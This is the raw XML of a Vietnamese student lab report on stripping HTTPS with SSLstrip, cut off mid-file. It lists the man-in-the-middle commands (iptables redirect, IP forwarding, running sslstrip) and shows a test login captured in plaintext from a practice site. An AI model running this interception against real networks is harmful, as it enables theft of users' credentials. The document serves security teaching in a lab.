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16AE7B" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Lab-Project 14: Hijacking HTTPS Sessions with SSLstrip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57308258" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack machine: Kali Linux </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0545C1" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Target Machine: Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451EA83" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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Starting the Linux Attacker Machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259E5E8F" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Sử dụng lệnh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ifconfig </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>để hiển thị địa chỉ IP của máy Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E6BEA" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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0AC35A0C" wp14:editId="036236A2">
            <wp:extent cx="5731200" cy="3314700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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14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39ED34A" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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=&gt; IP: 192.168.1.17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C8B36" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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25155B7A" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Sử dụng lệnh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ipconfig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để hiển thị IP của máy Target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F632E63" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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69D6A823" wp14:editId="6AFD24E6">
            <wp:extent cx="5731200" cy="2387600"/>
            <wp:effectExtent l="0" t="0" r="0" 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87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AF7685A" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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=&gt; IP: 192.168.1.18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B1D1C" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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848A1E7" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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Testing Networking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6577CF84" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Trên 2 máy sử dụng lệnh ping để kiểm tra kết nối giữa 2 máy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4060E86C" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Máy Attack: ping 192.168.1.18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C15F88" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0C7D71C3" wp14:editId="4381F006">
            <wp:extent cx="5010150" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6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23050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57ADE9D" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Máy Target: ping 192.168.1.17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BB10B2" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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6AE1FA22" wp14:editId="7A45D007">
            <wp:extent cx="5731200" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10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19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47C2041" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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58EE422A" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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Downloading SSLstrip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476D3C78" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Sử dụng các </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lệnh sau để tiến hành download SSLstrip tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B5A10F" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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curl -k https://samsclass.info/123/proj10/sslstrip-0.9.tar.gz &gt; sslstrip-0.9.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F091A6" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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tar xvf sslstrip-0.9.tar.gz (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giải nén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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56102E92" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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cd sslstrip-0.9 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>di chuyển đến thư mục sslstrip-0.9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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D789C1" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="634A891D" wp14:editId="3D7AFF04">
            <wp:extent cx="5731200" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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71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8CC8E79" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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A829E3C" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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Starting IP Forwarding on the Attacker Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD3B63" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Tại máy Attack, ở terminal sử dụng những command sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DC2BC5" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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cp /etc/sysctl.conf /etc/sysctl.conf.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6987E022" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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ab/>
        <w:t>nano /etc/sysctl.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAE61B4" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Tại dòng dưới “#Uncomment the next line to enable packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6F8B3" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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forwarding for IPv4”, bỏ dấu # và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lưu file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDFE1B6" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3296225B" wp14:editId="44B0D819">
            <wp:extent cx="5731200" cy="5613400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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613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AE2F888" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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065452A" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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Setting iptables to redirect HTTP requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B01DF" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Sử dụng các lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F23A8E5" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26133C19" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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iptables -t nat -L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF55BEE" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4F5F0528" wp14:editId="0B55B3B7">
            <wp:extent cx="5731200" cy="4216400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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16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1D492ED" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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315634B" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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Starting sslstrip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368EFBE1" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Tại máy Attack, thực hiện những lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661B318" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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python2 ss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lstrip.py -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2056B8" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="144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71DC2155" wp14:editId="24F7C061">
            <wp:extent cx="5731200" cy="2514600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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14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CAB90C2" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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python2 sslstrip.py -p -l 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDD39FE" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="144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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4F9BFE83" wp14:editId="2E7FC70D">
            <wp:extent cx="5731200" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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28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E06A51B" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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3FF8E2DC" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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Starting the Logfile Scanner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A23FAE5" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Tại máy attacker, thực hiện những lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D0F63" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A242DE5" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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cd sslstrip-0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6901775E" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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tail -f sslstrip-0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D2E6E" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:ind w:left="72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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="770400EE" wp14:editId="6FA4A80A">
            <wp:extent cx="5731200" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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85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3FB37A2" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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7921D7E" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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Setting the Target Machine to Use a Proxy Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8223DE" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Tại máy Target, mở trình duyệt Firefox và cấu hình như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6E539" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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1ACF71F5" wp14:editId="23539441">
            <wp:extent cx="5731200" cy="3784600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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84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FB492EC" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Tại firefox, truy cập vào website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
            <w:color w:val="1A73E8"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D75520F" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="586B49B1" wp14:editId="26F70177">
            <wp:extent cx="5731200" cy="2832100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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32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8D9D9A0" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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287E903D" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Tại đây, nhập username và password đăng nhập vào trang web này: có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username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là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test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và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password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là test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A704815" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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608A11E3" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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Viewing the Stolen Passsord:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD1D83" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Tại file sslstrip.log ta thu được tài khoản và mật khẩu của người dùng không bị mã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hóa do sử dụng http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC20195" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004B5999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6CFFF6DD" wp14:editId="32AE64D0">
            <wp:extent cx="5731200" cy="4064000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13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64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9C3868D" w14:textId="77777777" w:rsidR="004A595F" w:rsidRDefault="004A595F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D0D8564" w14:textId="33DEBDE5" w:rsidR="004A595F" w:rsidRDefault="00FB08B7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** Các lỗi gặp trong quá trình làm bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61225DAE" w14:textId="2F700B85" w:rsidR="00FB08B7" w:rsidRDefault="00FB08B7" w:rsidP="00FB08B7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- Tải twisted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876CB93" w14:textId="66E66569" w:rsidR="00FB08B7" w:rsidRDefault="00FB08B7" w:rsidP="00FB08B7">
      <w:pPr>
        <w:ind w:firstLine="144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+ Sau khi chạy lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB08B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 sslstrip.py -h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sẽ bị một lỗi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211D5B80" w14:textId="52C54F23" w:rsidR="00FB08B7" w:rsidRDefault="00FB08B7" w:rsidP="00FB08B7">
      <w:pPr>
        <w:ind w:firstLine="144"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB08B7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023B00D9" wp14:editId="2C9C4220">
            <wp:extent cx="4163006" cy="1333686"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="14" name="Picture 14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white background with black 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63006" cy="133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9D48B" w14:textId="592539E3" w:rsidR="00FB08B7" w:rsidRPr="00FB08B7" w:rsidRDefault="00FB08B7" w:rsidP="00FB08B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Thiếu Twisted Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018714E8" w14:textId="77777777" w:rsidR="00FB08B7" w:rsidRDefault="00FB08B7" w:rsidP="00FB08B7">
      <w:pPr>
        <w:ind w:firstLine="144"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA5ACA4" w14:textId="6B5C0498" w:rsidR="00FB08B7" w:rsidRDefault="00FB08B7" w:rsidP="00FB08B7">
      <w:pPr>
        <w:ind w:firstLine="144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+ Khắc phục như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44293A13" w14:textId="43CAAD90" w:rsidR="00762E17" w:rsidRDefault="00762E17" w:rsidP="00762E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Cài pip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171571C" w14:textId="1987442C" w:rsidR="00762E17" w:rsidRDefault="00762E17" w:rsidP="00762E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00762E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sudo apt install python2-pip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(lệnh này nếu xảy ra lỗi thì thực hiện tử wget)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A6056" w14:textId="40461340" w:rsidR="00762E17" w:rsidRDefault="00762E17" w:rsidP="00762E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00762E17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wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00762E17">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://bootstrap.pypa.io/pip/2.7/get-pip.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60428D61" w14:textId="2679827F" w:rsidR="00762E17" w:rsidRDefault="00762E17" w:rsidP="00762E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00762E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 get-pip.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C4C10" w14:textId="54FED6D6" w:rsidR="00762E17" w:rsidRDefault="00762E17" w:rsidP="00762E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00762E17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python2 -m pip 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–</w:t>
      </w:r>
      <w:r w:rsidRPr="00762E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>version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(Kiểm tra lại phiên bản xem đã cài chưa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F84AC6E" w14:textId="300ED4E7" w:rsidR="00762E17" w:rsidRDefault="002C1F0D" w:rsidP="00762E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Cài twisted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440A6A60" w14:textId="2E657A4E" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 -m pip install --upgrade setuptools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0611C5ED" w14:textId="2C5B98E6" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ython2 -m pip install --upgrade pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D014036" w14:textId="2B8870C9" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 -m pip install twisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4778ECF1" w14:textId="643163B6" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 -m pip install --upgrade cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CB2A83" w14:textId="51058D24" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 -m pip install service_identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB546FC" w14:textId="78711280" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D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24DFBA5A" w14:textId="3DBE8CA5" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Nếu có lỗi về cryptography như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FEAAC8" w14:textId="26942F83" w:rsidR="00FB08B7" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:rPr>
